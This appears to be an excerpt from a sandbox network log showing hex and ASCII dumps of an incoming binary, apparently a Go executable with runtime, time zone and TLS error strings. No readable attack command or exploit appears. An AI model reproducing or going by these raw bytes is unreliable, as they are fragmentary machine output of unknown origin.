2022-11-07 22:48:54 UTC	2816	IN	Data Raw: 00 00 00 00 00 a0 c4 68 00 00 00 00 00 00 00 00 00 00 00 00 00 4b ba 66 00 00 00 00 00 a0 c4 68 00 00 00 00 00 10 00 00 00 00 00 00 00 94 bb 66 00 00 00 00 00 60 c3 68 00 00 00 00 00 20 00 00 00 00 00 00 00 11 b2 66 00 00 00 00 00 60 c4 68 00 00 00 00 00 30 00 00 00 00 00 00 00 a0 1e 67 00 00 00 00 00 60 ba 68 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 79 b3 19 e5 02 08 08 19 00 00 00 00 00 00 00 00 76 fd 72 00 00 00 00 00 bd ef 02 00 00 00 00 00 c8 e2 66 00 00 00 00 00 70 11 6c 00 00 00 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 47 b0 66 00 00 00 00 00 a0 c4 68 00 00 00 00 00 00 00 00 00 00 00 00 00 4b ba 66 00 00 00 00 00 a0 c4 Data Ascii: hKfhf`h f`h0g`h@(yvrfplGfhKf
2022-11-07 22:48:54 UTC	2832	IN	Data Raw: 00 00 00 00 00 10 00 00 00 00 00 00 00 6c b1 66 00 00 00 00 00 a0 51 68 00 00 00 00 00 20 00 00 00 00 00 00 00 7f e8 66 00 00 00 00 00 60 c4 68 00 00 00 00 00 30 00 00 00 00 00 00 00 a8 de 66 00 00 00 00 00 e0 07 68 00 00 00 00 00 40 00 00 00 00 00 00 00 34 fb 66 00 00 00 00 00 60 6d 68 00 00 00 00 00 50 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 68 fb 21 8b 02 08 08 19 00 00 00 00 00 00 00 00 9a fd 72 00 00 00 00 00 97 63 03 00 00 00 00 00 48 d6 66 00 00 00 00 00 50 51 6c 00 00 00 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 a9 b0 66 00 00 00 00 00 60 c4 68 00 00 00 00 00 00 00 00 00 00 00 00 00 4f b0 66 00 00 00 00 00 20 50 68 00 00 00 00 00 10 00 00 00 00 00 00 00 53 b0 66 00 00 00 00 00 20 50 68 00 00 00 00 00 20 00 Data Ascii: lfQh f`h0fh@4f`mhP00h!rcHfPQlf`hOf PhSf Ph
2022-11-07 22:48:54 UTC	2848	IN	Data Raw: 00 00 00 00 00 b8 00 00 00 00 00 00 00 be b5 66 00 00 00 00 00 00 5f 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 7c d1 66 00 00 00 00 00 a0 b9 68 00 00 00 00 00 50 04 00 00 00 00 00 00 00 d5 66 00 00 00 00 00 a0 b9 68 00 00 00 00 00 60 04 00 00 00 00 00 00 70 1c 67 00 00 00 00 00 60 a7 68 00 00 00 00 00 70 04 00 00 00 00 00 00 8e b5 66 00 00 00 00 00 60 c2 68 00 00 00 00 00 80 04 00 00 00 00 00 00 58 c9 66 00 00 00 00 00 c0 0c 6a 00 00 00 00 00 a0 04 00 00 00 00 00 00 58 ca 66 00 00 00 00 00 c0 0c 6a 00 00 00 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 6f 40 6e 07 04 04 19 e0 c0 66 00 00 00 00 00 74 fd 72 00 00 00 00 00 8d f1 00 00 80 4c 04 00 c8 e2 Data Ascii: f_m\|fhPfh`pg`hpf`hXfjXfj.o@nftrL
2022-11-07 22:48:54 UTC	2864	IN	Data Raw: 00 00 00 00 00 08 26 00 00 0f 00 0d 00 10 00 00 00 00 00 00 00 de a3 00 00 20 05 02 00 e0 0d 17 00 e0 0d 17 00 c0 66 00 00 20 05 02 00 a0 09 17 00 a0 09 17 00 e3 34 00 00 20 05 02 00 00 00 00 00 00 00 00 00 68 15 00 00 a0 00 02 00 00 00 00 00 00 00 00 00 b0 89 00 00 c0 4e 02 00 c0 2e 17 00 c0 2e 17 00 c8 15 00 00 00 00 00 00 20 26 17 00 20 26 17 00 5a 08 00 00 20 05 02 00 00 00 00 00 00 00 00 00 f0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 36 00 00 20 05 02 00 00 00 00 00 00 00 00 00 cf 57 00 00 20 05 02 00 a0 2a 17 00 a0 2a 17 00 3c b2 00 00 00 00 00 00 e0 26 17 00 e0 26 17 00 45 1f 00 00 20 05 02 00 40 10 17 00 40 10 17 00 d6 a5 00 00 e0 55 02 00 40 2f 17 00 40 2f 17 00 56 6f 00 00 00 00 00 00 40 0c 17 00 40 0c 17 00 3c 31 00 00 00 00 00 00 20 08 Data Ascii: & f 4 hN.. & &Z z6 W **<&&E @@U@/@/Vo@@<1
2022-11-07 22:48:54 UTC	2880	IN	Data Raw: 00 00 00 00 00 ce d3 66 00 00 00 00 00 20 ba 68 00 00 00 00 00 30 00 00 00 00 00 00 00 ac bc 66 00 00 00 00 00 20 ba 68 00 00 00 00 00 38 00 00 00 00 00 00 00 52 df 66 00 00 00 00 00 20 ba 68 00 00 00 00 00 40 00 00 00 00 00 00 00 bb d1 66 00 00 00 00 00 20 bf 68 00 00 00 00 00 48 00 00 00 00 00 00 00 3b b0 66 00 00 00 00 00 a0 e2 68 00 00 00 00 00 4a 00 00 00 00 00 00 00 24 fc 66 00 00 00 00 00 20 c4 68 00 00 00 00 00 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 28 00 00 00 00 00 00 00 42 c1 4e a1 07 08 08 19 00 00 00 00 00 00 00 00 8a fd 72 00 00 00 00 00 29 94 00 00 60 0b 05 00 48 d6 66 00 00 00 00 00 a0 11 6d 00 00 00 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 48 26 Data Ascii: f h0f h8Rf h@f hH;fhJ$f hN0(BNr)`HfmH&
2022-11-07 22:48:54 UTC	2896	IN	Data Raw: 00 00 00 00 00 40 ee 6a 00 00 00 00 00 28 00 00 00 00 00 00 00 6a 47 67 00 00 00 00 00 40 ee 6a 00 00 00 00 00 38 00 00 00 00 00 00 00 80 39 67 00 00 00 00 00 40 ee 6a 00 00 00 00 00 48 00 00 00 00 00 00 00 65 25 67 00 00 00 00 00 a0 c3 68 00 00 00 00 00 58 00 00 00 00 00 00 00 ea 16 67 00 00 00 00 00 a0 c3 68 00 00 00 00 00 60 00 00 00 00 00 00 00 c4 f5 66 00 00 00 00 00 a0 c3 68 00 00 00 00 00 68 00 00 00 00 00 00 00 79 ea 66 00 00 00 00 00 a0 c3 68 00 00 00 00 00 70 00 00 00 00 00 00 00 a8 c5 66 00 00 00 00 00 20 e6 6a 00 00 00 00 00 79 00 00 00 00 00 00 00 a5 bc 66 00 00 00 00 00 60 c2 68 00 00 00 00 00 90 00 00 00 00 00 00 00 c6 b6 66 00 00 00 00 00 a0 c3 68 00 00 00 00 00 b0 00 00 00 00 00 00 00 c0 c8 66 00 00 00 00 00 a0 c3 68 00 00 00 00 00 b8 00 Data Ascii: @j(jGg@j89g@jHe%ghXgh`fhhyfhpf jyf`hfhfh
2022-11-07 22:48:54 UTC	2912	IN	Data Raw: 00 00 00 00 00 a7 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 68 00 00 a0 5f 02 00 60 d2 0a 00 60 d2 0a 00 7c a5 00 00 a0 5f 02 00 e0 d2 0a 00 e0 d2 0a 00 75 b2 00 00 a0 5f 02 00 60 d3 0a 00 60 d3 0a 00 df 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fb 08 00 00 e0 01 02 00 00 00 00 00 00 00 00 00 1a 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 77 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 16 00 00 a0 89 02 00 00 cb 0a 00 00 cb 0a 00 b6 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6e 69 00 00 c0 8d 02 00 a0 cd 0a 00 a0 cd 0a 00 3f 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 17 00 00 e0 01 02 00 00 00 00 00 00 00 00 00 30 19 00 00 a0 00 02 00 00 00 00 00 00 00 00 00 20 1a 00 00 00 00 00 00 00 00 Data Ascii: h_``\|_u_``iw7*ni?ZHh0
2022-11-07 22:48:54 UTC	2928	IN	Data Raw: 00 00 00 00 00 28 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 03 00 00 60 02 02 00 00 00 00 00 00 00 00 00 e8 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 1d 00 00 c0 5d 02 00 00 00 00 00 00 00 00 00 20 44 00 00 e0 55 02 00 00 00 00 00 00 00 00 00 2c 44 00 00 c0 4e 02 00 00 00 00 00 00 00 00 00 c0 07 00 00 60 02 02 00 00 00 00 00 00 00 00 00 90 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 1d 00 00 a0 00 02 00 00 00 00 00 00 00 00 00 90 15 00 00 60 05 02 00 00 00 Data Ascii: ('pftZ^`D] DU,DN`(`
2022-11-07 22:48:54 UTC	2944	IN	Data Raw: 6c 54 79 70 65 41 5d 20 3d 20 28 61 6c 6c 6f 77 61 72 67 70 3d 61 72 72 61 79 62 61 64 20 6e 63 68 64 69 72 63 6c 6f 73 65 64 65 66 65 72 66 61 6c 73 65 66 61 75 6c 74 67 46 72 65 65 67 63 69 6e 67 67 73 63 61 6e 68 63 68 61 6e 68 74 74 70 73 69 6d 61 70 32 69 6d 61 70 33 69 6d 61 70 73 69 6e 74 31 36 69 6e 74 33 32 69 6e 74 36 34 6d 61 74 63 68 6d 68 65 61 70 6d 6b 64 69 72 6d 6f 6e 74 68 6e 74 6f 68 73 70 61 6e 69 63 70 61 72 73 65 70 6f 70 33 73 72 61 6e 67 65 72 65 67 65 78 72 75 6e 65 20 73 63 61 76 20 73 63 68 65 64 73 6c 65 65 70 73 6c 69 63 65 73 6f 63 6b 73 73 70 69 6e 65 73 73 65 34 31 73 73 65 34 32 73 73 73 65 33 73 75 64 6f 67 73 77 65 65 70 74 65 78 74 2f 74 6c 73 3a 20 74 72 61 63 65 75 69 6e 74 38 75 73 61 67 65 75 74 66 2d 38 77 72 69 74 Data Ascii: lTypeA] = (allowargp=arraybad nchdirclosedeferfalsefaultgFreegcinggscanhchanhttpsimap2imap3imapsint16int32int64matchmheapmkdirmonthntohspanicparsepop3srangeregexrune scav schedsleepslicesocksspinesse41sse42ssse3sudogsweeptext/tls: traceuint8usageutf-8writ
2022-11-07 22:48:54 UTC	2960	IN	Data Raw: 75 65 6e 63 65 75 6e 65 78 70 65 63 74 65 64 20 6d 65 73 73 61 67 65 75 73 65 20 6f 66 20 63 6c 6f 73 65 64 20 66 69 6c 65 76 61 6c 75 65 20 6f 75 74 20 6f 66 20 72 61 6e 67 65 20 28 25 64 20 62 79 74 65 73 20 6f 6d 69 74 74 65 64 29 20 61 6c 72 65 61 64 79 20 72 65 67 69 73 74 65 72 65 64 20 63 61 6c 6c 65 64 20 75 73 69 6e 67 20 6e 69 6c 20 2a 2c 20 20 67 2d 3e 61 74 6f 6d 69 63 73 74 61 74 75 73 3d 2c 20 67 70 2d 3e 61 74 6f 6d 69 63 73 74 61 74 75 73 3d 31 34 39 30 31 31 36 31 31 39 33 38 34 37 36 35 36 32 35 32 30 30 36 30 31 30 32 31 35 30 34 30 35 5a 30 37 30 30 37 34 35 30 35 38 30 35 39 36 39 32 33 38 32 38 31 32 35 41 6c 74 61 69 20 53 74 61 6e 64 61 72 64 20 54 69 6d 65 42 61 68 69 61 20 53 74 61 6e 64 61 72 64 20 54 69 6d 65 43 61 6e 61 64 69 Data Ascii: uenceunexpected messageuse of closed filevalue out of range (%d bytes omitted) already registered called using nil *, g->atomicstatus=, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125Altai Standard TimeBahia Standard TimeCanadi
2022-11-07 22:48:54 UTC	2976	IN	Data Raw: 20 6c 65 6e 67 74 68 69 6e 76 61 6c 69 64 20 68 65 61 64 65 72 20 66 69 65 6c 64 20 6e 61 6d 65 20 25 71 69 6e 76 61 6c 69 64 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 20 25 71 3a 20 25 76 69 6e 76 61 6c 69 64 20 72 75 6e 74 69 6d 65 20 73 79 6d 62 6f 6c 20 74 61 62 6c 65 6d 61 6c 66 6f 72 6d 65 64 20 4d 49 4d 45 20 68 65 61 64 65 72 20 6c 69 6e 65 3a 20 6d 68 65 61 70 2e 66 72 65 65 53 70 61 6e 4c 6f 63 6b 65 64 20 2d 20 73 70 61 6e 20 6d 69 73 73 69 6e 67 20 73 74 61 63 6b 20 69 6e 20 73 68 72 69 6e 6b 73 74 61 63 6b 6d 73 70 61 6e 2e 73 77 65 65 70 3a 20 6d 20 69 73 20 6e 6f 74 20 6c 6f 63 6b 65 64 6d 75 6c 74 69 70 61 72 74 3a 20 6d 65 73 73 61 67 65 20 74 6f 6f 20 6c 61 72 67 65 6e 65 77 70 72 6f 63 31 3a 20 6e 65 77 20 67 20 69 73 20 6e 6f 74 20 47 Data Ascii: lengthinvalid header field name %qinvalid proxy address %q: %vinvalid runtime symbol tablemalformed MIME header line: mheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockedmultipart: message too largenewproc1: new g is not G
2022-11-07 22:48:54 UTC	2992	IN	Data Raw: 3a 20 74 72 61 69 6c 69 6e 67 20 64 61 74 61 20 61 66 74 65 72 20 58 2e 35 30 39 20 6b 65 79 2d 69 64 20 62 65 63 61 75 73 65 20 69 74 20 64 6f 65 73 6e 27 74 20 63 6f 6e 74 61 69 6e 20 61 6e 79 20 49 50 20 53 41 4e 73 32 30 30 36 2d 30 31 2d 30 32 20 31 35 3a 30 34 3a 30 35 2e 39 39 39 39 39 39 39 39 39 20 2d 30 37 30 30 20 4d 53 54 32 37 37 35 35 35 37 35 36 31 35 36 32 38 39 31 33 35 31 30 35 39 30 37 39 31 37 30 32 32 37 30 35 30 37 38 31 32 35 63 68 61 69 6e 20 69 73 20 6e 6f 74 20 73 69 67 6e 65 64 20 62 79 20 61 6e 20 61 63 63 65 70 74 61 62 6c 65 20 43 41 63 69 70 68 65 72 3a 20 69 6e 63 6f 72 72 65 63 74 20 74 61 67 20 73 69 7a 65 20 67 69 76 65 6e 20 74 6f 20 47 43 4d 63 72 79 70 74 6f 2f 72 73 61 3a 20 69 6e 76 61 6c 69 64 20 6f 70 74 69 6f 6e Data Ascii: : trailing data after X.509 key-id because it doesn't contain any IP SANs2006-01-02 15:04:05.999999999 -0700 MST277555756156289135105907917022705078125chain is not signed by an acceptable CAcipher: incorrect tag size given to GCMcrypto/rsa: invalid option
2022-11-07 22:48:54 UTC	3008	IN	Data Raw: 73 3b 20 64 72 6f 70 70 69 6e 67 20 69 6e 76 61 6c 69 64 20 62 79 74 65 73 6e 65 74 2f 68 74 74 70 3a 20 72 65 71 75 65 73 74 20 63 61 6e 63 65 6c 65 64 20 77 68 69 6c 65 20 77 61 69 74 69 6e 67 20 66 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 6e 65 77 70 72 6f 63 3a 20 66 75 6e 63 74 69 6f 6e 20 61 72 67 75 6d 65 6e 74 73 20 74 6f 6f 20 6c 61 72 67 65 20 66 6f 72 20 6e 65 77 20 67 6f 72 6f 75 74 69 6e 65 6f 73 3a 20 69 6e 76 61 6c 69 64 20 75 73 65 20 6f 66 20 57 72 69 74 65 41 74 20 6f 6e 20 66 69 6c 65 20 6f 70 65 6e 65 64 20 77 69 74 68 20 4f 5f 41 50 50 45 4e 44 72 65 66 6c 65 63 74 2e 46 75 6e 63 4f 66 3a 20 6c 61 73 74 20 61 72 67 20 6f 66 20 76 61 72 69 61 64 69 63 20 66 75 6e 63 20 6d 75 73 74 20 62 65 20 73 6c 69 63 65 72 65 66 6c 65 63 74 3a 20 69 Data Ascii: s; dropping invalid bytesnet/http: request canceled while waiting for connectionnewproc: function arguments too large for new goroutineos: invalid use of WriteAt on file opened with O_APPENDreflect.FuncOf: last arg of variadic func must be slicereflect: i
2022-11-07 22:48:54 UTC	3024	IN	Data Raw: 00 00 e4 00 61 03 0a 00 00 00 e5 00 63 03 27 00 00 00 e7 00 65 03 00 00 00 00 e8 00 65 03 01 00 00 00 e9 00 65 03 02 00 00 00 ea 00 65 03 08 00 00 00 eb 00 69 03 00 00 00 00 ec 00 69 03 01 00 00 00 ed 00 69 03 02 00 00 00 ee 00 69 03 08 00 00 00 ef 00 6e 03 03 00 00 00 f1 00 6f 03 00 00 00 00 f2 00 6f 03 01 00 00 00 f3 00 6f 03 02 00 00 00 f4 00 6f 03 03 00 00 00 f5 00 6f 03 08 00 00 00 f6 00 75 03 00 00 00 00 f9 00 75 03 01 00 00 00 fa 00 75 03 02 00 00 00 fb 00 75 03 08 00 00 00 fc 00 79 03 01 00 00 00 fd 00 79 03 08 00 00 00 ff 00 41 03 04 00 00 01 00 00 61 03 04 00 00 01 01 00 41 03 06 00 00 01 02 00 61 03 06 00 00 01 03 00 41 03 28 00 00 01 04 00 61 03 28 00 00 01 05 00 43 03 01 00 00 01 06 00 63 03 01 00 00 01 07 00 43 03 02 00 00 01 08 00 63 03 02 Data Ascii: ac'eeeeiiiinooooouuuuyyAaAaA(a(CcCc
2022-11-07 22:48:54 UTC	3040	IN	Data Raw: 00 00 00 00 00 00 9a 56 00 00 00 00 00 80 98 56 00 00 00 00 00 c0 7a 63 00 00 00 00 00 60 a3 63 00 00 00 00 00 a0 b0 63 00 00 00 00 00 60 ee 62 00 00 00 00 00 e0 ac 63 00 00 00 00 00 60 ad 63 00 00 00 00 00 c0 90 63 00 00 00 00 00 00 59 61 00 00 00 00 00 60 10 61 00 00 00 00 00 c0 5b 61 00 00 00 00 00 60 8d 63 00 00 00 00 00 60 8a 63 00 00 00 00 00 e0 39 60 00 00 00 00 00 80 5e 61 00 00 00 00 00 20 d7 60 00 00 00 00 00 e0 91 63 00 00 00 00 00 60 34 60 00 00 00 00 00 80 ae 63 00 00 00 00 00 a0 28 63 00 00 00 00 00 40 b4 63 00 00 00 00 00 60 2d 63 00 00 00 00 00 e0 b9 63 00 00 00 00 00 20 4a 63 00 00 00 00 00 e0 a6 63 00 00 00 00 00 80 a7 63 00 00 00 00 00 20 a9 63 00 00 00 00 00 a0 a6 63 00 00 00 00 00 c0 8e 62 00 00 00 00 00 80 d7 5f 00 00 00 00 00 00 f0 Data Ascii: VVzc`cc`bc`ccYa`a[a`c`c9`^a `c`4`c(c@c`-cc Jccc ccb_
2022-11-07 22:48:54 UTC	3056	IN	Data Raw: 00 06 00 00 00 04 00 00 00 03 03 03 01 00 00 00 00 06 00 00 00 04 00 00 00 00 0c 0f 04 00 0e 00 00 06 00 00 00 05 00 00 00 00 17 07 01 05 00 00 00 06 00 00 00 05 00 00 00 00 05 01 01 02 00 00 00 06 00 00 00 04 00 00 00 00 04 0e 0c 00 05 00 00 03 00 00 00 0c 00 00 00 13 00 00 00 03 00 00 00 06 00 00 00 03 00 00 00 00 02 01 05 04 00 00 00 06 00 00 00 03 00 00 00 05 01 01 00 00 00 00 00 03 00 00 00 09 00 00 00 0e 00 06 00 00 00 00 00 06 00 00 00 05 00 00 00 00 10 18 14 12 01 00 00 06 00 00 00 03 00 00 00 01 05 04 05 05 05 00 00 03 00 00 00 10 00 00 00 00 00 41 01 00 00 00 00 06 00 00 00 03 00 00 00 00 04 05 04 07 00 00 00 06 00 00 00 08 00 00 00 0d 09 09 09 00 09 00 00 06 00 00 00 03 00 00 00 00 00 04 02 01 00 00 00 06 00 00 00 04 00 00 00 00 08 09 06 00 04 Data Ascii: A
2022-11-07 22:48:54 UTC	3072	IN	Data Raw: 00 d8 bd 0a 00 35 00 00 00 ff ff 00 00 0f 01 00 00 4c 00 00 00 83 c3 0a 00 28 00 00 00 ff ff 00 00 10 01 00 00 7b 01 00 00 cb d8 0a 00 f2 01 00 00 ff ff 00 00 10 01 00 00 84 01 00 00 e0 47 09 00 24 00 00 00 ff ff 00 00 10 01 00 00 43 02 00 00 20 67 05 00 fc 00 00 00 ff ff 00 00 13 01 00 00 14 00 00 00 6a 6b 07 00 24 00 00 00 ff ff 00 00 15 01 00 00 1a 00 00 00 6a 6b 07 00 24 00 00 00 ff ff 00 00 16 01 00 00 13 00 00 00 ed f4 09 00 24 00 00 00 ff ff 00 00 16 01 00 00 55 00 00 00 4b c5 08 00 31 00 00 00 ff ff 00 00 16 01 00 00 7b 00 00 00 e0 f9 0a 00 39 00 00 00 ff ff 00 00 19 01 00 00 6e 00 00 00 4b c5 08 00 31 00 00 00 ff ff 00 00 1c 01 00 00 b2 00 00 00 fb 12 0b 00 28 00 00 00 ff ff 00 00 1c 01 00 00 80 01 00 00 e9 15 0b 00 36 00 00 00 ff ff 00 00 04 00 Data Ascii: 5L({G$C gjk$jk$$UK1{9nK1(6
2022-11-07 22:48:54 UTC	3088	IN	Data Raw: 00 97 04 03 00 75 00 00 00 ff ff 00 00 43 00 00 00 47 00 00 00 b6 66 01 00 67 00 00 00 00 00 00 00 20 00 00 00 24 00 00 00 c3 66 01 00 7d 00 00 00 ff ff 00 00 43 00 00 00 50 00 00 00 d8 66 01 00 57 00 00 00 00 00 00 00 20 00 00 00 61 00 00 00 e7 66 01 00 68 00 00 00 ff ff 00 00 18 00 00 00 1e 06 00 00 5e 69 03 00 44 00 00 00 ff ff 00 00 18 00 00 00 ff 05 00 00 5f 4f 03 00 e8 00 00 00 ff ff 00 00 18 00 00 00 a7 06 00 00 39 59 01 00 a1 00 00 00 ff ff 00 00 18 00 00 00 ac 06 00 00 5e 69 03 00 bb 00 00 00 ff ff 00 00 18 00 00 00 27 07 00 00 21 59 01 00 54 00 00 00 ff ff 00 00 18 00 00 00 29 07 00 00 97 04 03 00 7a 00 00 00 ff ff 00 00 18 00 00 00 37 08 00 00 b7 70 03 00 38 00 00 00 ff ff 00 00 18 00 00 00 41 08 00 00 9f 34 02 00 6e 00 00 00 ff ff 00 00 18 00 Data Ascii: uCGfg $f}CPfW afh^iD_O9Y^i'!YT)z7p8A4n
2022-11-07 22:48:54 UTC	3104	IN	Data Raw: 00 18 00 00 00 25 01 00 00 58 5b 01 00 3c 00 00 00 ff ff 00 00 18 00 00 00 27 01 00 00 40 3e 02 00 50 00 00 00 ff ff 00 00 18 00 00 00 30 01 00 00 69 5b 01 00 b3 00 00 00 ff ff 00 00 18 00 00 00 e1 02 00 00 57 57 03 00 3a 00 00 00 ff ff 00 00 18 00 00 00 e4 02 00 00 57 57 03 00 8e 00 00 00 ff ff 00 00 18 00 00 00 e6 02 00 00 57 57 03 00 c5 00 00 00 ff ff 00 00 18 00 00 00 d8 06 00 00 66 99 01 00 59 00 00 00 ff ff 00 00 18 00 00 00 d2 06 00 00 57 57 03 00 8c 00 00 00 ff ff 00 00 18 00 00 00 c7 06 00 00 66 99 01 00 c2 00 00 00 ff ff 00 00 18 00 00 00 42 07 00 00 58 5b 01 00 3c 00 00 00 ff ff 00 00 18 00 00 00 44 07 00 00 69 5b 01 00 64 00 00 00 ff ff 00 00 18 00 00 00 48 07 00 00 69 5b 01 00 cb 00 00 00 ff ff 00 00 18 00 00 00 0d 0f 00 00 0a 59 01 00 58 00 Data Ascii: %X[<'@>P0i[WW:WWWWfYWWfBX[<Di[dHi[YX
2022-11-07 22:48:54 UTC	3120	IN	Data Raw: 00 95 37 04 00 28 00 00 00 ff ff 00 00 3c 00 00 00 23 02 00 00 95 37 04 00 69 00 00 00 ff ff 00 00 3c 00 00 00 24 02 00 00 29 39 04 00 82 00 00 00 ff ff 00 00 3c 00 00 00 34 02 00 00 44 39 04 00 e3 00 00 00 ff ff 00 00 4f 00 00 00 40 00 00 00 b0 4d 02 00 24 01 00 00 ff ff 00 00 4f 00 00 00 45 00 00 00 3a 22 03 00 48 01 00 00 ff ff 00 00 4f 00 00 00 47 00 00 00 70 4a 04 00 56 01 00 00 01 00 00 00 55 00 00 00 70 01 00 00 31 4d 01 00 c5 01 00 00 ff ff 00 00 3b 00 00 00 58 00 00 00 b6 66 01 00 2d 00 00 00 00 00 00 00 20 00 00 00 24 00 00 00 c3 66 01 00 2e 00 00 00 ff ff 00 00 3b 00 00 00 5b 00 00 00 d8 66 01 00 68 00 00 00 02 00 00 00 20 00 00 00 61 00 00 00 e7 66 01 00 79 00 00 00 ff ff 00 00 32 00 00 00 e4 00 00 00 b6 66 01 00 3a 00 00 00 00 00 00 00 20 00 Data Ascii: 7(<#7i<$)9<4D9O@M$OE:"HOGpJVUp1M;Xf- $f.;[fh afy2f:
2022-11-07 22:48:54 UTC	3136	IN	Data Raw: 00 ff 01 00 00 ff ff 00 00 a7 01 00 00 d5 1e 00 00 e6 6b 05 00 52 00 00 00 ff ff 00 00 a7 01 00 00 e1 1e 00 00 1f 22 10 00 13 01 00 00 ff ff 00 00 a7 01 00 00 ea 1e 00 00 3f 22 10 00 36 01 00 00 02 00 00 00 a7 01 00 00 d9 04 00 00 1f 22 10 00 44 01 00 00 ff ff 00 00 a7 01 00 00 d6 1f 00 00 49 04 10 00 f6 00 00 00 ff ff 00 00 a7 01 00 00 d7 1f 00 00 76 28 10 00 19 01 00 00 ff ff 00 00 a7 01 00 00 d8 1f 00 00 49 04 10 00 4b 01 00 00 ff ff 00 00 a7 01 00 00 d9 1f 00 00 76 28 10 00 56 01 00 00 ff ff 00 00 a7 01 00 00 43 21 00 00 9b 32 10 00 52 00 00 00 00 00 00 00 a7 01 00 00 b3 08 00 00 80 ba 0f 00 5d 00 00 00 ff ff 00 00 a7 01 00 00 50 21 00 00 8c 89 0f 00 24 01 00 00 ff ff 00 00 a7 01 00 00 55 21 00 00 cc 38 10 00 f3 01 00 00 ff ff 00 00 a7 01 00 00 4b 22 Data Ascii: kR"?"6"DIv(IKv(VC!2R]P!$U!8K"
2022-11-07 22:48:54 UTC	3152	IN	Data Raw: 00 15 00 00 00 ff ff 00 00 1d 00 00 00 ae 03 00 00 e6 5f 01 00 0e 00 00 00 ff ff 00 00 1d 00 00 00 ae 03 00 00 fa 5f 01 00 0e 00 00 00 ff ff 00 00 1d 00 00 00 b2 03 00 00 d3 5f 01 00 95 00 00 00 ff ff 00 00 1d 00 00 00 b3 03 00 00 e6 5f 01 00 ab 00 00 00 ff ff 00 00 1d 00 00 00 b3 03 00 00 fa 5f 01 00 ab 00 00 00 ff ff 00 00 49 00 00 00 3c 00 00 00 c3 df 02 00 28 00 00 00 ff ff 00 00 49 00 00 00 3c 00 00 00 c3 df 02 00 28 00 00 00 ff ff 00 00 49 00 00 00 3e 00 00 00 05 65 02 00 68 00 00 00 ff ff 00 00 49 00 00 00 40 00 00 00 05 65 02 00 83 00 00 00 ff ff 00 00 49 00 00 00 40 00 00 00 05 65 02 00 83 00 00 00 ff ff 00 00 49 00 00 00 42 00 00 00 05 65 02 00 a3 00 00 00 ff ff 00 00 50 00 00 00 e8 00 00 00 fd e9 02 00 28 00 00 00 00 00 00 00 50 00 00 00 3d 01 Data Ascii: _____I<(I<(I>ehI@eI@eIBeP(P=
2022-11-07 22:48:54 UTC	3168	IN	Data Raw: 31 1a 00 00 00 82 21 18 00 00 00 00 01 18 00 00 00 00 01 78 e0 1f 00 00 07 78 f4 1f 00 00 07 78 e0 1f 00 04 07 78 e0 1f 00 00 07 79 e0 1f 00 10 07 78 e0 1f 00 00 87 78 e0 1f 00 20 07 78 e0 1f 00 00 47 78 e0 1f 00 08 07 78 e0 1f 00 01 01 78 e0 1f 00 00 05 78 e0 1f 00 00 09 78 e0 1f 00 00 00 ff ff 00 00 10 00 00 00 c3 00 00 00 31 4d 01 00 70 00 00 00 ff ff 00 00 10 00 00 00 dd 00 00 00 31 4d 01 00 94 01 00 00 ff ff 00 00 10 00 00 00 d8 00 00 00 3d 4d 01 00 a5 02 00 00 ff ff 00 00 10 00 00 00 da 00 00 00 3d 4d 01 00 bc 02 00 00 ff ff 00 00 10 00 00 00 d4 00 00 00 3d 4d 01 00 df 02 00 00 ff ff 00 00 10 00 00 00 d4 00 00 00 31 4d 01 00 df 02 00 00 ff ff 00 00 10 00 00 00 cd 00 00 00 31 4d 01 00 47 03 00 00 ff ff 00 00 10 00 00 00 cb 00 00 00 3d 4d 01 00 a7 01 Data Ascii: 1!xxxxyxx xGxxxxx1Mp1M=M=M=M1M1MG=M
